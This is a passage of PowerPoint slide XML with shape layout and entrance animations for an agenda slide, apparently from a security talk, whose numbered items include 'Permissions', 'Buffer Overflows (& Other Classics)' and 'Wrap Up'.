              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" spc="0" sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="247" name="9."/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="21444117" y="624293"/>
              <a:ext cx="127345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5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>9.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="252" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1499349" y="2128377"/>
            <a:ext cx="23167181" cy="1270001"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="23167180" cy="1270000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="249" name="Permissions"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="635000"/>
              <a:ext cx="20683059"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r">
                <a:defRPr sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Permissions</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="250" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="20994512" y="0"/>
              <a:ext cx="2172669" cy="1270000"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 15000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" spc="0" sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="251" name="10."/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="21444117" y="624293"/>
              <a:ext cx="127345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5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>10.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="256" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1499349" y="3599758"/>
            <a:ext cx="23167181" cy="1270001"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="23167180" cy="1270000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="253" name="Buffer Overflows (&amp; Other Classics)"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="635000"/>
              <a:ext cx="20683059"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r">
                <a:defRPr sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Buffer Overflows (&amp; Other Classics)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="254" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="20994512" y="0"/>
              <a:ext cx="2172669" cy="1270000"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 15000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" spc="0" sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="255" name="11."/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="21444117" y="624293"/>
              <a:ext cx="127345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5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>11.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="260" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1499349" y="5071140"/>
            <a:ext cx="23167181" cy="1270001"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="23167180" cy="1270000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="257" name="Wrap Up"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="635000"/>
              <a:ext cx="20683059"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r">
                <a:defRPr sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Wrap Up</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="258" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="20994512" y="0"/>
              <a:ext cx="2172669" cy="1270000"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 15000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" spc="0" sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="259" name="12."/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="21444117" y="624293"/>
              <a:ext cx="127345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5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>12.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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216"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="216"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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220"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="220"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22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8" presetID="2" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="224"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="224"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22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Class="entr" nodeType="afterEffect" presetSubtype="8" presetID="2" grpId="4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="228"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="228"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22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Class="entr" nodeType="afterEffect" presetSubtype="8" presetID="2" grpId="5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="232"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="232"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="23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Class="entr" nodeType="afterEffect" presetSubtype="8" presetID="2" grpId="6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="236"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="236"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="236"/>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Class="entr" nodeType="afterEffect" presetSubtype="8" presetID="2" grpId="7" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="240"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="240"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="240"/>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Class="entr" nodeType="afterEffect" presetSubtype="8" presetID="2" grpId="8" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="244"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="244"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="244"/>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Class="entr" nodeType="afterEffect" presetSubtype="2" presetID="2" grpId="9" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="46" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="248"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="248"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="248"/>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Class="entr" nodeType="afterEffect" presetSubtype="2" presetID="2" grpId="10" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="51" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="252"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="252"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="252"/>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Class="entr" nodeType="afterEffect" presetSubtype="2" presetID="2" grpId="11" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="56" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="256"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="256"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="256"/>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Class="entr" nodeType="afterEffect" presetSubtype="2" presetID="2" grpId="12" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="61" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="260"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="260"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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6" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="240" grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="260" grpId="12"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="220" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="252" grpId="10"/>
